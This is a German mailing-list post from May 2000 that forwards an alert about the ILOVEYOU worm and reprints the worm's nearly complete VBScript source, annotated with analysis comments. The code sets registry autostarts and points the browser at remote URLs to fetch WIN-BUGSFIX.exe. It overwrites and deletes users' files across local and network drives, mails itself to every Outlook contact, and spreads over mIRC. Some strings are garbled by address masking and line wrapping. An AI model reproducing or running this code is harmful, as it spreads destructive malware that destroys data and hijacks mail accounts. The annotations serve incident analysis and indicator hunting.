Jan-Thomas Seidler on Thu, 4 May 2000 13:51:06 +0200 (CEST)



[rohrpost] Fwd: Alert: Wurm ILOVEYOU randaliert


...nicht nur in At sondern auch in D ist wohl gerade die hölle los...
jan-thomas


Ursprüngliche Nachricht:
> q/depesche 00.5.4/3
> 
> 
> Alert: Wurm ILOVEYOU randaliert in AT
> 
> Subject: ILOVEYOU
> 
> inhalt folgendes vbs script, soll sehr infektiös sein. Genaueres sobald 
> es mehr Info gibt. Mehrere Magistratsabteilungen sollen OFFline sein.
> 
> -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
> relayed by [email protected]
> -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
> 
> rem  barok -loveletter(vbe) <i hate go to school>
> rem 			by: spyder  /  [email protected]  /
>  @GRAMMERSoft Group  /  Manila,Philippines
> rem Analysis note: script-level setup. Run-time errors are suppressed from
> rem here on, so failed operations do not stop the script or show a dialog.
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=""
> ctr=0
> Set fso = CreateObject("Scripting.FileSystemObject")
> rem The script opens its own file (WScript.ScriptFullname) for reading and
> rem keeps the full text in vbscopy; infectfiles later writes vbscopy into
> rem other files.
> set file = fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=file.ReadAll
> main()
> sub main()
> rem Analysis note: entry routine. It changes one Windows Scripting Host
> rem setting, drops three copies of the running script, then calls the
> rem persistence, HTML, mail and file-overwrite routines in that order.
> On Error Resume Next
> dim wscr,rr
> set wscr=CreateObject("WScript.Shell")
> rem Reads the per-user Windows Scripting Host "Timeout" value and, if it is
> rem 1 or more, writes it back as 0. A Timeout of 0 under this key is a
> rem host-side artefact worth checking during triage.
> rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Wind
> ows Scripting Host\Settings\Timeout")
> if (rr>=1) then
> wscr.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting 
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> rem FileSystemObject special folders: 0 = Windows, 1 = System, 2 = Temp.
> Set dirwin = fso.GetSpecialFolder(0)
> Set dirsystem = fso.GetSpecialFolder(1)
> Set dirtemp = fso.GetSpecialFolder(2)
> rem Dropped copies (file-name indicators): MSKernel32.vbs and
> rem LOVE-LETTER-FOR-YOU.TXT.vbs in the System folder, Win32DLL.vbs in the
> rem Windows folder.
> Set c = fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> rem Analysis note: persistence and browser start-page changes. Registry
> rem indicators written here: HKLM ...\CurrentVersion\Run\MSKernel32,
> rem ...\RunServices\Win32DLL, ...\Run\WIN-BUGSFIX, and the per-user
> rem Internet Explorer "Start Page" value.
> On Error Resume Next
> Dim num,downread
> rem Both autostart values point at the copies dropped by main().
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
> rem Internet Explorer download directory, falling back to c:\ when the
> rem value reads back empty.
> downread=""
> downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Intern
> et Explorer\Download Directory")
> if (downread="") then
> downread="c:\"
> end if
> rem fileexist (defined later in this listing) returns 1 when the file is
> rem NOT present, so this branch runs when WinFAT32.exe is absent from the
> rem System folder. It sets the IE start page to one of four URLs, chosen at
> rem random, each ending in WIN-BUGSFIX.exe (network indicators).
> if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
> Randomize
> num = Int((4 * Rnd) + 1)
> if num = 1 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTF
> wetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> elseif num = 2 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikj
> UIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-
> BUGSFIX.exe"
> elseif num = 3 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hf
> FEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> elseif num = 4 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtu
> HJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshf
> gqw237461234iuy7thjg/WIN-BUGSFIX.exe"
> end if
> end if
> rem fileexist returns 0 when the file IS present: once WIN-BUGSFIX.exe is
> rem found in the download directory it is registered under Run and the
> rem start page is reset to about:blank.
> if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
> regcreate 
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
> on\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet 
> Explorer\Main\Start Page","about:blank"
> end if
> end sub
> sub listadriv
> rem Analysis note: walks every drive whose FileSystemObject DriveType is 2
> rem (fixed) or 3 (network) and hands its root to folderlist. Network drives
> rem being included means mapped shares are in scope for the file overwrites,
> rem not only the local disk.
> On Error Resume Next
> Dim d,dc,s
> Set dc = fso.Drives
> For Each d in dc
> If d.DriveType = 2 or d.DriveType=3 Then
> folderlist(d.path&"\")
> end if
> Next
> rem s is never assigned in this routine, and this is a sub, so the line
> rem below has no visible effect.
> listadriv = s
> end sub
> sub infectfiles(folderspec)  
> rem Analysis note: processes every file in one folder by extension. Files
> rem opened with mode 2 are overwritten with the script text (vbscopy), so
> rem their original content is lost and has to come from backups.
> On Error Resume Next
> dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
> set f = fso.GetFolder(folderspec)
> set fc = f.Files
> for each f1 in fc
> ext=fso.GetExtensionName(f1.path)
> ext=lcase(ext)
> s=lcase(f1.name)
> rem vbs / vbe: overwritten in place, name unchanged.
> if (ext="vbs") or (ext="vbe") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> rem js, jse, css, wsh, sct, hta: overwritten, copied to <basename>.vbs,
> rem then the original file is deleted.
> elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or 
> (ext="sct") or (ext="hta") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> bname=fso.GetBaseName(f1.path)
> set cop=fso.GetFile(f1.path)
> cop.copy(folderspec&"\"&bname&".vbs")
> fso.DeleteFile(f1.path)
> rem jpg / jpeg: overwritten, copied to <name>.<ext>.vbs, original deleted.
> elseif(ext="jpg") or (ext="jpeg") then
> set ap=fso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> set cop=fso.GetFile(f1.path)
> cop.copy(f1.path&".vbs")
> fso.DeleteFile(f1.path)
> rem mp3 / mp2: the original is NOT overwritten. A <name>.<ext>.vbs file is
> rem created next to it and 2 is added to the original's attributes (2 is
> rem the FileSystemObject Hidden flag), so these files are recoverable by
> rem clearing the attribute.
> elseif(ext="mp3") or (ext="mp2") then
> set mp3=fso.CreateTextFile(f1.path&".vbs")
> mp3.write vbscopy
> mp3.close
> set att=fso.GetFile(f1.path)
> att.attributes=att.attributes+2
> end if
> rem mIRC handling: when a folder holds one of the listed mIRC files, a
> rem script.ini is written there whose JOIN handler DCC-sends
> rem LOVE-LETTER-FOR-YOU.HTM from the System folder to users joining a
> rem channel. eq remembers the last folder handled so it is written once.
> rem An unexpected script.ini with this header text is a host indicator.
> if (eq<>folderspec) then
> if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or 
> (s="script.ini") or (s="mirc.hlp") then
> set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
> scriptini.WriteLine "[script]"
> scriptini.WriteLine ";mIRC Script"
> scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, 
> if mIRC will"
> scriptini.WriteLine "     corrupt... WINDOWS will affect and will not 
> run correctly. thanks"
> scriptini.WriteLine ";"
> scriptini.WriteLine ";Khaled Mardam-Bey"
> scriptini.WriteLine ";http://www.mirc.com";
> scriptini.WriteLine ";"
> scriptini.WriteLine "n0=on 1:JOIN:#:{"
> scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
> scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\LOVE-
> LETTER-FOR-YOU.HTM"
> scriptini.WriteLine "n3=}"
> scriptini.close
> eq=folderspec
> end if
> end if
> next  
> end sub
> sub folderlist(folderspec)  
> rem Analysis note: recursive directory walk. For each subfolder of
> rem folderspec it calls infectfiles and then recurses. infectfiles is only
> rem ever called on subfolders, so files sitting directly in the folder
> rem first passed in (the drive root, from listadriv) are not processed.
> On Error Resume Next
> dim f,f1,sf
> set f = fso.GetFolder(folderspec)  
> set sf = f.SubFolders
> for each f1 in sf
> infectfiles(f1.path)
> folderlist(f1.path)
> next  
> end sub
> sub regcreate(regkey,regvalue)
> rem Analysis note: thin wrapper that writes regvalue to regkey through a
> rem new WScript.Shell object. Every registry write in regruns goes through
> rem this routine.
> Set regedit = CreateObject("WScript.Shell")
> regedit.RegWrite regkey,regvalue
> end sub
> function regget(value)
> rem Analysis note: thin wrapper that returns the registry value named by
> rem the argument, read through a new WScript.Shell object.
> Set regedit = CreateObject("WScript.Shell")
> regget=regedit.RegRead(value)
> end function
> function fileexist(filespec)
> rem Analysis note: the return value is inverted relative to the name.
> rem It returns 0 when the file exists and 1 when it does not; read the
> rem "=1" / "=0" tests in regruns with that in mind.
> On Error Resume Next
> dim msg
> if (fso.FileExists(filespec)) Then
> msg = 0
> else
> msg = 1
> end if
> fileexist = msg
> end function
> function folderexist(folderspec)
> rem Analysis note: this function is not called anywhere in this listing.
> rem It assigns its result to fileexist rather than folderexist, so as
> rem written it never sets its own return value.
> rem NOTE(review): the FileSystemObject method is normally FolderExists;
> rem GetFolderExists looks like an error that On Error Resume Next hides.
> On Error Resume Next
> dim msg
> if (fso.GetFolderExists(folderspec)) then
> msg = 0
> else
> msg = 1
> end if
> fileexist = msg
> end function
> sub spreadtoemail()
> rem Analysis note: mail propagation through Outlook automation. For each
> rem MAPI address list it sends one message per entry, subject "ILOVEYOU",
> rem with LOVE-LETTER-FOR-YOU.TXT.vbs from the System folder attached.
> rem The subject, body text and attachment name are the mail-gateway
> rem indicators. The registry values under HKCU\Software\Microsoft\WAB\ are
> rem the host-side record of what was sent.
> On Error Resume Next
> dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
> set regedit=CreateObject("WScript.Shell")
> set out=WScript.CreateObject("Outlook.Application")
> set mapi=out.GetNameSpace("MAPI")
> for ctrlists=1 to mapi.AddressLists.Count
> set a=mapi.AddressLists(ctrlists)
> x=1
> rem regv is the entry count stored for this list by an earlier run
> rem (treated as 1 when the value is empty). The list is only walked when
> rem it now holds more entries than that.
> regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\
> WAB\"&a)
> if (regv="") then
> regv=1
> end if
> if (int(a.AddressEntries.Count)>int(regv)) then
> for ctrentries=1 to a.AddressEntries.Count
> malead=a.AddressEntries(x)
> rem Per-recipient marker: an entry is mailed only if no value named after
> rem it exists yet, and the value is set to 1 after sending.
> regad=""
> regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft
> \WAB\"&malead)
> if (regad="") then
> set male=out.CreateItem(0)
> male.Recipients.Add(malead)
> male.Subject = "ILOVEYOU"
> male.Body = vbcrlf&"kindly check the attached LOVELETTER 
> coming from me."
> male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-
> YOU.TXT.vbs")
> male.Send
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"RE
> G_DWORD"
> end if
> x=x+1
> next
> rem Both branches store the current entry count for the list.
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEn
> tries.Count
> else
> regedit.RegWrite 
> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEn
> tries.Count
> end if
> next
> Set out=Nothing
> Set mapi=Nothing
> end sub
> sub html
> rem Analysis note: writes LOVE-LETTER-FOR-YOU.HTM into the System folder
> rem (the file that the script.ini written by infectfiles offers over DCC).
> rem dta1 and dta2 are the head and tail of the page, stored with
> rem placeholder sequences (#-# @-@ ?-? ^-^) in place of ' " / \ .
> rem The page text asks the reader to enable ActiveX. The VBScript in dta2
> rem writes the decoded source to MSKernel32.vbs in the System folder and
> rem sets the HKLM ...\CurrentVersion\Run\MSKernel32 value.
> rem NOTE(review): the "[email protected]" fragments inside the strings below
> rem look like address masking applied by the web archive, not original
> rem text, and lines are wrapped by the mail client. Verify against another
> rem copy before relying on this listing for analysis.
> On Error Resume Next
> dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
> dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-
> ?TITLE><META NAME=@-@Generator@-@ CONTENT=@-
> @BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
> "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? 
> [email protected] ?-? @GRAMMERSoft Group ?-? Manila, 
> Philippines ?-? March 2000@-@>"&vbcrlf& _
> "<META NAME=@-@Description@-@ CONTENT=@-@simple but i 
> think this is good...@-@>"&vbcrlf& _
> "<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-
> #;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-
> @ "&vbcrlf& _
> "ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-
> #LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ 
> BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-
> @>"&vbcrlf& _
> "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To 
> Enable to read this HTML file<BR>- Please press #-#YES#-# button 
> to Enable ActiveX<?-?p>"&vbcrlf& _
> "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-
> @yellow@-@>----------z--------------------z----------<?-?MARQUEE> 
> "&vbcrlf& _
> "<?-?BODY><?-?HTML>"&vbcrlf& _
> "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
> "<!--?-??-?"&vbcrlf& _
> "if (window.screen){var wi=screen.availWidth;var 
> hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&v
> bcrlf& _
> "?-??-?-->"&vbcrlf& _
> "<?-?SCRIPT>"&vbcrlf& _
> "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
> "<!--"&vbcrlf& _
> "on error resume next"&vbcrlf& _
> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
> "aw=1"&vbcrlf& _
> "code="
> dta2="set fso=CreateObject(@[email protected]@-
> @)"&vbcrlf& _
> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
> "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
> "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
> "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-
> @)"&vbcrlf& _
> "wri.write code4"&vbcrlf& _
> "wri.close"&vbcrlf& _
> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) 
> then"&vbcrlf& _
> "if (err.number=424) then"&vbcrlf& _
> "aw=0"&vbcrlf& _
> "end if"&vbcrlf& _
> "if (aw=1) then"&vbcrlf& _
> "document.write @-@ERROR: can#-#t initialize ActiveX@-
> @"&vbcrlf& _
> "window.close"&vbcrlf& _
> "end if"&vbcrlf& _
> "end if"&vbcrlf& _
> "Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
> "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-
> ^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-
> @,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
> "?-??-?-->"&vbcrlf& _
> "<?-?SCRIPT>"
> rem Placeholder sequences in both templates are swapped for the real
> rem characters: #-# to ', @-@ to ", ?-? to /, ^-^ to \ .
> dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
> dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
> dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
> dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
> dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
> dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
> dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
> dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
> rem The script re-reads its own source and encodes every line: ' " \ become
> rem [-[ ]-] %-% (chr 91, 93, 37 around chr 45). Each line is wrapped in
> rem double quotes so the whole text can follow "code=" in the page. The
> rem replace() calls inside dta2 reverse this encoding.
> set fso=CreateObject("Scripting.FileSystemObject")
> set c=fso.OpenTextFile(WScript.ScriptFullName,1)
> lines=Split(c.ReadAll,vbcrlf)
> l1=ubound(lines)
> for n=0 to ubound(lines)
> lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
> lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
> lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
> if (l1=n) then
> lines(n)=chr(34)+lines(n)+chr(34)
> else
> lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
> end if
> next
> rem The output file is created empty, reopened for writing (mode 2) and
> rem filled with page head, encoded source, then page tail.
> set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
> YOU.HTM")
> b.close
> set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-
> YOU.HTM",2)
> d.write dt5
> d.write join(lines,vbcrlf)
> d.write vbcrlf
> d.write dt6
> d.close
> end sub
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> -.-. --.- -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  
> COMMENTS
> mailto [email protected]
> SUBSCRIBE
> http://www.quintessenz.at OR
> mailto [email protected]
> body: subscribe
> UNSUBSCRIBE
> mailto [email protected]
> body: leave
> -.-. --.- -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  
>  # c)



